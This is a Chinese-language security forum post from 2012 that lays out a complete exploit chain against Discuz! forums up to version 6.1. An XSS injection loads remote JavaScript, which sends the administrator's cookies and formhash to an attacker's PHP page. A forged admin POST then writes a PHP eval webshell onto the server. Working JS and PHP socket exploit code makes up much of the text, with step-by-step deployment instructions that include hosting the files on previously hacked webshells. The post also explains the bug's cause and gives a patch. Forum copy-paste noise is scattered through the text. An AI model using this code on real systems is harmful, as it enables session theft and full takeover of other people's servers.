找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3814|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell% N/ |  m! N/ P: Q9 X5 V* @
By racle @tian6.com' h- W& w1 U1 f7 U
欢迎转帖.但请保留版权信息.- e* j3 o! A) e1 }
受影响版本iscuz<=6.1.0,gbk+utf+big52 |/ u" O. A  ^+ L% l

* }5 O$ z6 ?: N( }" W6 r新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
* t$ t: t8 J0 b: g! ^( b; p7 `6 c/ I
/ B& N1 c; W1 w5 T% Q
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
! B- u  Q$ L! I, w; @0 A5 ?8 A当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.; }  u5 O1 }" D

5 q& k4 c- C  J/ X分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等.." ^0 @  N' u4 z
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
' h5 x1 B/ W* S( G' {$ T: N; e8 o7 H* _3 r( j8 Y

; d6 m) F$ H, B% }----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
+ F+ K: w1 l% z4 p0 f
! n& ?9 H- D' I. F( C$ ^% m
2 w- }; a$ ?3 K& Wproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
6 F8 s6 b/ ]  H+ A/ t# D6 V, P# M6 X- r. R2 S  h6 n. H$ @
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
$ l" {8 L9 P; R5 T( `+ V1 C0 a
6 f9 j* e0 j( zproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
6 X0 h( g5 b4 G3 t* p1 C5 ?! t8 s! J
% R' j) y+ s- N
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
! \0 o9 [: g) }; `3 Z' l# I  |; T5 J# B. y' |  o, w' d
        global $runwizardfile, $runwizardhistory;2 \$ F9 L  F+ G

9 N0 @6 G( H- k/ W  P. v2 `        $fp = fopen($runwizardfile, 'w');
) S& D0 u+ M" `1 r# f' M; X% p: e% N& P6 i' \1 r4 U* K& G2 m
        fwrite($fp, serialize($runwizardhistory));! l  t# v) u; Z' h9 u, e; V, g

$ ^( M# W5 k$ Q6 l: }- g) g0 p        fclose($fp);# e- }& X; Q0 [# u$ E6 w6 l

( ^! }/ z: _9 B* x. l. b- d5 T}' U: M" M7 ?8 `8 R3 S4 p, A
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.; ]8 \: {* p; v
以下是修补的办法:function saverunwizardhistory() {% Z7 I* @" o' f6 W1 ?

, X5 n- @1 f3 P: ?( ^        global $runwizardfile, $runwizardhistory;
4 h' M& q( [! q* }4 X1 k/ u8 A/ P- d" F; u7 V
        $fp = fopen($runwizardfile, 'w');$ ^' S; i1 y4 e( H  V
4 g! U9 I7 `0 L( J5 m" g+ N% Z
        $s = '<?php exit;?>';
. E! ~+ [2 W0 ?1 d7 K5 i; w" ]# P8 u8 @% x5 C0 x  ^! K
        $s .= serialize($runwizardhistory);# s7 {( s0 P( z( P$ @

# c* c4 t4 S0 I/ A( l. X9 M        fwrite($fp, $s);
0 B- M6 S0 T$ ]5 W
* q5 }, p+ x/ [/ B        fclose($fp);4 X/ w  e. t3 x$ O+ r
& K1 u: b' s3 N8 T4 m
}" v2 s: a. z0 W8 E7 v* V1 l
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
3 N. R3 |& |& l; `# M: d& U/ ], \
; ^/ l/ Y0 _5 r- I' T& b) ?! A% a3 s0 c  ~

) F$ W8 ], K* T0 o2 _----------------------------------------漏洞的成因和利用方法分隔线------------------------------------------------------------------------------ p8 j; q: n- ]4 c" e

6 r% ?6 x0 Z' q* H4 P5 q. T# b% Z/ M! }8 z: Q. i; d8 h4 [
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.: ?" [  [8 w( S" P$ }) ~
" @% ~, Q+ I% `2 f) F
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
/ I6 d) }9 \3 Y! A. n
2 Z, r" p8 m9 j! ?% Z% `这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
3 p& U4 q+ s3 B, h
. ^6 o) |3 O* G5 T4 P首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:. A7 P* Y4 w/ T7 c
' Q7 _3 ~; A2 C$ O4 W
var url="http://目标网站/admincp.php";      5 D: k5 k$ D. o7 w1 I

9 {: r- N/ |: u/ j9 F; m  U/*获得cookies*/$ Z0 n# `. m) I! C: b! H, _
; V& B4 Q6 Q6 Z: a
function getURL(s) {4 z. v% W: D' C+ c4 \( T. t

$ m: ?; L8 q' L3 E9 c* Rvar image = new Image();
6 r7 ~6 w) }7 f& r. g4 m* ]8 \2 c5 s9 n( n" {( U: X
image.style.width = 0;
" w3 Q1 S7 ^- X+ Y+ `. h  e# e5 ?8 T. x! K1 C
image.style.height = 0;
" r) q: o: h9 ]7 r: G$ n# i& ?+ h
; g7 |* q6 V( s3 W: |image.src = s;9 @7 W% f0 v5 k7 Q! m' B8 t

9 [- D6 i8 d1 K  ^4 q}, R0 I+ F+ F3 Y2 z4 }" p* m5 S
: y- K, w/ a* Y/ t1 s; A" C
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php: J  V( N/ ~- ]
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];( M- \' s* T# N+ j- U! f2 K
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) & V" B% l- ?9 i# g/ }0 y5 Y

6 I4 [$ `% D' Z, b1 S% a; b+ L+ F  Q9 }$ c, l9 C
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
. p, F) v- ?5 S, [2 p
5 c$ ?, @  R: ]+ [! A2 A, O. d
4 w4 n8 B/ `1 M( J2 |& k& K& P$ _# v6 ^/ a  v
/*hash*/
2 _4 G. X+ i9 _  D# K+ n7 X, X. u/ U, ~  E
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
; m+ h, Z7 b$ ~4 q8 F# D
3 X8 b, A; U% @; BxmlHttpReq.open("GET", url+"admincp.php?action=home", false);
/ c4 f6 q8 ~! x2 t8 v6 n9 f8 N9 @1 d% ~6 v
xmlHttpReq.send();/ |  i5 A9 L2 `5 u

1 y8 q) d4 n/ e) i! U  N7 g9 F6 Lvar resource = xmlHttpReq.responseText;, t& K3 d- }# R+ L

2 G% L2 n3 a# z* m, [var numero = resource.search(/formhash/);& Z: s# E, R8 V7 |; j8 U
+ j3 a$ |: y" x
var formhash=encodeURIComponent(resource.substr(numero+17,8));- [! A  L- }. R9 M  W( G7 _
: a5 M6 Y( o) R, x' z/ f
! a  k. J3 j" |& r9 d  _
$ F- Q' u. K0 I; M" S
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 : d8 l0 ?" Z1 L' p9 f4 j& Z. J- Z
4 U8 w3 L  h% ~' t' s( Z8 j
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
! L/ G7 G6 U) v0 {- s7 E0 M1 c3 ]5 K8 F( Z. D
xmlHttpReq.setRequestHeader("Referer", url);
5 w- Y' z' C3 O( H' |4 c. w2 U
. B4 e0 R' l! s7 g% nxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
, V, R+ F  u) _9 N& v; X" f# A( C1 M
xmlHttpReq.setrequestheader("content-length",post.length); ( V* }: P: V% m0 W4 @

7 i& d: z6 C* R! {) bxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
5 Q5 @9 `) X4 z2 B" C0 |5 Q8 `; G1 y+ b6 J, |# Q$ i0 |
xmlHttpReq.send(post);//发送数据
2 O  w5 b9 i: p6 U复制代码这里HASH我假设正确,这样提交,也无须cookies; y6 ~9 U; }( K+ S
( n# ]# a0 \6 Q+ Q1 |% D  j, ~
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
+ r; E. \  t' U- r1 j! |: v
2 f; ?2 r7 I% \4 Qif (!$sock) die("$errstr ($errno)\n");
2 W/ s6 ]+ J0 u$ j' I3 [$ B* b( y/ O/ J6 a
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';' F' q& }! q; j" l$ G7 ~; G

# D% G: i1 |$ W
* i+ e6 @6 G0 r! c1 Q) e) y1 {, l: M8 m/ H5 P6 T2 \7 G
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");
4 ~/ C6 r; G* p' W
2 n3 @, j( }/ j: Y" O: D7 Hfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
( v3 ^$ P: ~4 I* o8 j/ y8 w7 a. t6 Y  ^' j/ A; X
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");6 G( p8 t; M/ s5 ]
2 T. c% E$ E& x* X' F+ N. p$ d
fwrite($sock, "Accept-Language: zh-cn\r\n");
+ d) \! A) m9 |- ]& f/ o7 X- p
5 B# _* {: c6 X/ D" vfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
. q  k, \( Z% p8 z; P( `8 L$ w2 F2 h8 U+ d: r
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
, `& U& e+ B$ W8 j! L$ q
. m8 w- ?- j) I. I! o4 `5 G$ W& @fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");8 c6 T1 B# N2 S( h% u- m1 `0 J

2 L% |$ V1 k) I! efwrite($sock, "Host: $url\r\n");
  u; l5 Y9 h- G
7 |  k0 D' ^+ P7 S4 A* V1 L7 Sfwrite($sock, "Content-Length: ".strlen($data)."\r\n");) J( r8 w: Z; x. V  U6 w5 c  I

# j7 x% n" ~  Ffwrite($sock, "Connection: Keep-Alive\r\n");  f" N3 g) M6 g- I2 M5 E! t

$ H2 r9 i9 z+ i4 Rfwrite($sock, "Cache-Control: no-cache\r\n");
2 f- E. Y. ~( c3 m) N: w
) W6 b: v6 |* h8 bfwrite($sock, "Cookie:".$cookies."\r\n\r\n");
8 G5 @7 s% Q9 q6 X" s
9 z0 ]. r/ Q8 c; R! r2 cfwrite($sock, $data);0 o! p/ Z7 |7 ^; L% O( V. {
. V5 F& ]' ], z1 M. H* d6 [
) I, ]- ~% k9 k/ m" ^! P
5 W/ W6 l4 N0 I# y. Y* b
$headers = "";
/ ?' ]& [/ ]+ D/ c1 d# L* X7 K" n  _
while ($str = trim(fgets($sock, 4096)))" Y- K! z) W- _. H( V5 q

- A( B3 B& `2 v2 q4 V" }     $headers .= "$str\n";
3 n: k7 W: U8 x& }: D5 N6 W4 t/ w: W
9 T, g8 j# Q% h  R2 E+ |echo "\n";0 `) G5 e* p; U3 v3 y: g$ h

& J- V; s8 W. i- j$body = "";
* o5 h+ N* N6 S! J: H1 S
$ g! o- t# T( c' b7 _0 G4 ^8 q% Twhile (!feof($sock))
1 Z+ ~1 S" \9 e2 Q, H1 L( r; T  v4 Z$ ~: t
     $body .= fgets($sock, 4096);7 W* Q: g) F# Z- L: Q8 C5 b

4 {5 |- Q4 T9 @$ C+ }* `fclose($sock);: S; D& |" W% Z
" r0 \) }2 q2 @0 m4 ?2 P9 Y
echo $body;5 T8 Y: m, `* S6 L9 o
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
! k* F9 x; a5 K5 J( F$ k8 g0 F/ |
* A" K  x* C# P- P6 }
. w" s, y$ R% s-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
+ a. q' q) V9 x* J
3 i1 [4 `& x' I6 [: O- P% h' b, I% R
1HP SOCKET利用方法首先打开racle.js
! v" M7 E* A% d! x
" R9 i. I: |4 hvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
( |- q% ]  T+ I5 z  b& t6 F$ X+ n; z

) H7 W/ C6 x/ w0 z( e' V( p' z
* ^, Q8 @6 o& y( t6 P  M然后打开racle@tian6.php
% K/ l" U4 r) N, a% m
# j% ^) D# N0 \$ Y# @4 a$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
) F5 l" @! ]9 h6 B" P: L/ t0 X6 N5 L; q+ v+ a

1 `2 x0 k6 S; Q! g0 K+ L/ O& k  s+ z8 b" }* K. [4 Z+ Q2 f' \6 M
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:$ e! t9 F+ z+ Q1 |$ ]# Q7 x0 p2 v

9 L; }  {2 |* u/ ogetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));' [7 m( F1 ?4 l0 A2 n4 F9 a: o3 U. f
; P8 t0 v( u+ S

+ q! r& _% p  m0 x) t" x; T  r6 c" G( [- q- F
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
* o# L3 ]! t% F- T1 N! J复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.8 b% M3 ~* y! [: a

. V) b; Q3 |. ~( ]+ f  ]( D3 N. f9 }9 O  C
- J( ^& {/ I7 r
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:0 e; h' f  ^( H0 E" j# `8 R: ?

5 H  v8 x1 T- M) i, T0 b8 q) ovar formhash=encodeURIComponent(resource.substr(numero+17,8));
2 p* K3 c7 G' h- B
& O# Y: n$ Z# i6 ~; W3 l
& e/ \- B" g1 q- X" j9 p3 {( ?3 G& m1 E& T+ P) g) M7 E
var formhash=encodeURIComponent(resource.substr(numero+9,8));
$ p( i" ]' e8 S% J复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
) `! N8 a+ w7 D+ A1 n) u1 X
. x3 l/ M6 I: _- s如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
9 `5 @" V) o' E* c+ V/ L7 g+ {6 |7 F
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.1 M! ^: }+ T0 D

" p3 h+ [) o( Z) d( c- k. }不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
1 t& W4 p$ n! L: i" s# s3 B 5 a/ l. o3 n* G4 E' J0 M' r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表